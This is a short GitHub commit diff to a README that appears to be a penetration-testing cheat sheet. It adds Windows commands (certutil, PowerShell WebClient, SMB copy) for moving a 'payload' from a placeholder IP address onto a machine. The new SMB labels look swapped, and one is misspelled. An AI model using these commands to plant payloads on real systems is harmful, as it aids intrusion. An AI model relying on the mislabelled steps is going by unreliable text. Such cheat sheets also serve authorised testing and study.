Update README.md

This commit is contained in:
Joe Totes
2022-09-07 11:01:12 -04:00
committed by GitHub
parent c6b774516f
commit 7f34f16658

View File

@@ -1396,8 +1396,12 @@ certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
# Windows - Download file using powershell # Windows - Download file using powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')" powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')"
# SMB SHARE # SMB SHARE UPLOAD FILE
\\{IP ADDRESS}\share\{FILE} copy \\{IP ADDRESS}\share\{FILE}
# SMB SHARE DOWNLAOD FILE
net use z: \\{IP ADDRESS}\share\
copy {FILE} z:
# {IP ADDRESS}: IP Address of the client from step one # {IP ADDRESS}: IP Address of the client from step one
# {FILE}: The payload to be transferred # {FILE}: The payload to be transferred